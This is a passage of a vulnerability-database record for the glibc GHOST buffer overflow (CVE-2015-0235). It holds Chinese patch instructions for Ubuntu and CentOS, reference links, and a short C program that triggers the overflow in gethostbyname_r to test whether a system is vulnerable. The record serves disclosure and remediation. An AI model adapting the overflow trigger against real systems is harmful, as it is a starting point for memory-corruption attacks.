src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.28%E9%85%8D%E5%9B%BE1.jpg\" alt=\"1.28\u914d\u56fe1\" width=\"580\" height=\"612\"></strong></p><p><strong>\u5bf9\u6b64\uff0c\u77e5\u9053\u521b\u5b87\u5b89\u5168\u7814\u7a76\u56e2\u961f\u5728\u7b2c\u4e00\u65f6\u95f4\u7814\u7a76\u5e76\u53d1\u5e03\u4e86\u90e8\u5206\u4fee\u590d\u65b9\u6848\uff1a</strong></p><p><strong>Ubuntu12.04\u4fee\u590d\u65b9\u6848\uff1a</strong></p><p>\u5728/etc/apt/sources.list\u6dfb\u52a0\u5b98\u65b9\u5b89\u5168\u66f4\u65b0\u6e90\uff1a</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>\u7136\u540e\u6267\u884c\uff1a</p><p>$ sudo apt-get update</p><p>$ sudo apt-get upgrade</p><p><strong>CentOS 6/7\uff1a</strong></p><p>\u4f7f\u7528\u5b98\u65b9\u6e90\uff0c\u7136\u540e\u6267\u884c\uff1a</p><p># yum clean all && yum update</p><p> </p><p><strong>\u53c2\u8003\u94fe\u63a5\uff1a</strong></p><ul><li><a href=\"http://www.openwall.com/lists/oss-security/2015/01/27/9\">http://www.openwall.com/lists/oss-security/2015/01/27/9</a></li><li><a href=\"http://d.hatena.ne.jp/Kango/20150128/1422409960\">http://d.hatena.ne.jp/Kango/20150128/1422409960</a></li></ul>", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "seebug", "title": "Linux glibc \u7f13\u51b2\u533a\u6ea2\u51fa\n (\u5e7d\u7075(Ghost))", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89237", "id": "SSV:89237", "sourceData": "\n #include <netdb.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n \n#define CANARY \"in_the_coal_mine\"\n \nstruct {\n char buffer[1024];\n char canary[sizeof(CANARY)];\n} temp = { \"buffer\", CANARY };\n \nint main(void) {\n struct hostent resbuf;\n struct hostent *result;\n int herrno;\n int retval;\n \n /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/\n size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;\n char name[sizeof(temp.buffer)];\n memset(name, '0', len);\n name[len] = '\\0';\n \n retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);\n \n if (strcmp(temp.canary, CANARY) != 0) {\n puts(\"vulnerable\");\n exit(EXIT_SUCCESS);\n }\n if (retval == ERANGE) {\n puts(\"not vulnerable\");\n exit(EXIT_SUCCESS);\n }\n puts(\"should not happen\");\n exit(EXIT_FAILURE);\n}\n#* from http://www.openwall.com/lists/oss-security/2015/01/27/9 */\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89237", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/
Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Network Intrusion Prevention System (CVE-2015-0235)
